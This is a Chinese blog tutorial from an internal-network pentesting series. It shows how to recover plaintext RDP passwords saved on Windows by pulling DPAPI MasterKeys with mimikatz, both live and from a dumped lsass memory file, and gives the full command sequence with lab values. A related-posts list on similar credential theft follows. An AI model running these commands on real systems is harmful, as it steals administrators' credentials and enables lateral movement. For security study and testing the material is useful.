RDP密码凭据抓取

于 2024-05-15 18:18:40 发布
阅读量466 收藏 4
点赞数 3
分类专栏: 内网篇 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/138912366
版权

一. RDP明文密码抓取的原理

1. 原理

Credentials的解密是Windows系统信息收集中非常重要的一环,接下来我们就讲解RDP凭证的抓取和破解!

在平时的工作中,管理员为了方便管理计算机,经常会进行远程桌面连接,由于每次都需要输入密码觉得麻烦,就点击了保留凭据,这个过程是可逆,所以我们可以将保存的密码进行还原。

还原的原理:Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密使用这个密码,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。

在这里插入图片描述

2. 查看凭据的方法
1、查看mstsc的连接记录
命令:cmdkey /list
2、查找本地的Credentials
命令:dir /a %userprofile%\appdata\local\microsoft\credentials\*

先远程登陆一下DC
在这里插入图片描述
输入命令查到有凭据
在这里插入图片描述
在这里插入图片描述

二. 在线读取RDP明文密码

1、使用mimikatz获取该文件的MasterKey的guid
命令: mimikatz dpapi::cred /in:凭据绝对路径
mimikatz dpapi::cred /in:C:\Users\ONE-PC\appdata\local\microsoft\credentials\A8B668E08E637A92E21873927D96086F

在这里插入图片描述
根据路径已经看到有凭据
在这里插入图片描述
这里得guid值为:03361ca6-b4ec-471a-996e-4db74309fc94

2、找到内存中对应的MasterKey
命令: mimikatz sekurlsa::dpapi

权限太低,需要提权
在这里插入图片描述
在这里插入图片描述

得到MasterKey值为:532a0d5969b8196e607ca5f6e6c5db218a1941a0975b852c75dc52af1dd30b2b8f22de005668fe285ad0697f8749f605c5258e91e62a774823b0eab83716b840

3、最后打开mimikatz通过MasterKey值去解密凭据文件
命令: 
dpapi::cred /in:凭据文件路径 /masterkey:masterkey值
dpapi::cred /in:C:\Users\ONE-PC\appdata\local\microsoft\credentials\A8B668E08E637A92E21873927D96086F /masterkey:532a0d5969b8196e607ca5f6e6c5db218a1941a0975b852c75dc52af1dd30b2b8f22de005668fe285ad0697f8749f605c5258e91e62a774823b0eab83716b840

在这里插入图片描述

三.离线读取RDP明文密码

1、下载目标lsass内存(方法很多我就不介绍了之前都用过)
2、下载凭据到本地

在这里插入图片描述
从CS上下载的文件在CS服务端downloads文件夹中
在这里插入图片描述

3、用mimikatz载入dump回来的内存
命令: sekurlsa::minidump lsass.dmp

在这里插入图片描述

4、获取Credentials的GUID
命令: dpapi::cred /in:A8B668E08E637A92E21873927D96086F

在这里插入图片描述

5、获取内存中所有的MasterKey
命令:sekurlsa::dpapi

在这里插入图片描述

6、利用MasterKey解密
命令:
dpapi::cred /in:A8B668E08E637A92E21873927D96086F /masterkey:532a0d5969b8196e607ca5f6e6c5db218a1941a0975b852c75dc52af1dd30b2b8f22de005668fe285ad0697f8749f605c5258e91e62a774823b0eab83716b840

在这里插入图片描述

Y22Lee
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Windows RDP凭证抓取密码破解测试的方法
lza20001103的博客
09-02 1529
Windows RDP凭证抓取密码破解【密码抓取和爆破】 文章目录Windows RDP凭证抓取密码破解【密码抓取和爆破】破解原理凭证的查看查看凭证命令在线破离线破解 破解原理 Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证抓取和破解。 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程
RDP文件密码加解密
12-13
用于远程连接中的.rdp文件的password 51:b: 这个设置的明文密码和二进制哈希转换
获取远程管理软件保存的凭据
Ms08067安全实验室
03-14 991
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书内网敏感数据的发现内网的核心敏感数据,不仅包括数据库、电子邮件,还包括个人数据及组织的业务数据、技术数据等。可以说,价值较高的数据基本都在内网中。本文重点介绍如何快速定位个人计算机,并对计算机操作系统信息、浏览器登录和使用的历史记录、用户文件操作行为以及聊天软件对话内容等信息进行收集。因此,了解攻击者的操作流程,对内网数...
Armitage
子曰小玖的博客
04-22 5693
一,目录 关于Armitage在我们开始之前... 入门如何让任何女人与您交谈 用户界面之旅这么多漂亮的屏幕截图 主机管理您必须找到它们来破解它们。 剥削这是有趣的东西 剥削后,这是非常有趣的东西 机动性遍及网络并达到更多目标 团队Metasploit这是网络攻击管理! 脚本约束下一步... 1.关于阿米蒂奇 1.1什么是阿米蒂奇? Armitage是用于Metasplo...
[内网]RDP远程桌面密码凭证获取
最新发布
qq_64787896的博客
03-24 418
根据上面实验找到的路径,将计算机保存的凭据拷贝到Win2012,使用dpapi读取文件。根据guid找到masterkey (可能需要privilege::debug提权)导出lsass.dmp文件,上传到Win2012。实验二:读取lsass1.dmp文件。2012R2以上版本都会以密文存放。实验一:找到凭据位置读取。查看当前计算机保存的凭据。其余操作同上一个实验。
rdp、ftp协议的密码爆破
过期的秋刀鱼
08-02 652
远程桌面 rdp协议 3389文件传输 FTP协议 20 21攻击方:Kali测试方:Win7两台都要在同一网段。
hydra利用rdp协议破解密码
u011250160的博客
11-26 2681
靶机系统windows10 开启rdp服务:
密码抓取--获取已控机器本地保存的RDP密码
热门推荐
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
RDPEncrypter RDP加密解密器 远程桌面dos命令密码加密 RDP密码加密
03-12
远程桌面dos命令密码加密和解密,远程桌面RDP文件登录密码加密和解密
rdp文件中密码的生成
06-02
rdp文件中有一行密码说明,利用这个文件可以生成所需要的密码
远程桌面密码查看器
09-08
远程桌面密码查看器
RDP密码加密
05-17
RDP配置文件中的密码进行加密和解密。 How to Encrypt: Type in a password in the Password box and click Encrypt it. How to Decrypt: Type or paste a password hash (as saved in an rdp file but without ...
rdp密码生成工具
09-11
rdp密码加密解密工具
rdp密码加密.zip
11-12
rdp.exe是一款windows RDP文件对密码进行加密的工具 windows远程桌面做自动化链接的工具时,无法使用原始明文密码,需要使用此工具对密码进行加密,并添加至自定义的rdp配置文件 ------分隔符 ------ username:s:...
RDP终端密码加密_1.0.rar
06-20
远程桌面RDP密码加密解密工具用来生成rdp文件中的密码的工具,经过测试确实可以将你的密码生成密码,也可以将rdp密码进行解密,如果rdp文件保存不当就是噩梦,建议大家谨慎使用自动登录. 远程桌面通过RDP文件自动...
获取rdp保存的凭证
weixin_44747030的博客
12-23 1437
获取rdp保存的凭证
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证抓取密码破解
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 397
Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证(这个可以理解为密码),接下来我们就讲解RDP凭证抓取和破解 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
win10 rdp 密码加密工具
07-31
Win10 RDP远程桌面协议)是Windows 10操作系统中提供的一种远程连接工具,它允许用户从远程位置访问和控制其他计算机。RDP密码加密工具是一种用于保护RDP连接密码的工具。 在Win10的RDP中,密码是通过加密算法进行保护的,以确保数据传输的安全性。具体而言,RDP使用了一种称为ClearText Password Encryption(明文密码加密)的方法来加密密码。这种加密方法基于基于RSA Public Key Cryptography(RSA公钥加密)算法和RC4 Cipher(RC4加密算法)。 在建立RDP连接之前,用户需要输入其登录凭据,包括用户名和密码。在输入密码后,RDP会将密码进行加密,并将其传输到远程计算机。当远程服务器收到加密的密码后,它会使用该服务器上的密钥进行解密。 这种加密方法可以确保在RDP连接中传输的密码安全的,因为它使用了强大的加密算法。只有通过正确的解密密钥才能解密密码,这增加了密码泄漏的难度。此外,RDP还提供了对其他安全功能的支持,如网络层身份验证和重定向设备加密,以增强连接的安全性。 总之,Win10的RDP密码加密工具通过使用RSA公钥加密和RC4加密算法,提供对密码安全加密和传输。这样可以确保在RDP连接中传输的密码安全的,并且只有经过正确解密的密钥才能访问密码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值